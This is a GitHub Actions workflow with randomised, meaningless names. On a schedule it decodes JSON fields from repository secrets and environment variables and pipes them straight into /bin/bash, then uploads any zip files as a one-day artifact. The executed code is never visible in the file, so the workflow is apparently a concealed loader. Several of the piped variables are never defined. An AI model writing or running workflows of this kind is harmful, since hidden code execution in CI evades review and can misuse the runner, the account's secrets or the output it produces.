name: qiyuandangri
on:
  workflow_dispatch:

  schedule:
    - cron: '6 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qiyuandangri
        env:
          cswin1854: ${{ secrets.cswin1854 }}
        run: |
          printf '%s' "$cswin1854" | jq -r .pnp4696 | /bin/bash
          printf '%s' "$nqfz824" | jq -r .msbuq20 | /bin/bash
          printf '%s' "$mlzww301" | jq -r .ackug34225 | /bin/bash
          echo $nbobo708 | jq -r .uf74 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 3ZLo5e3l
          path: "*.zip"
          retention-days: 1
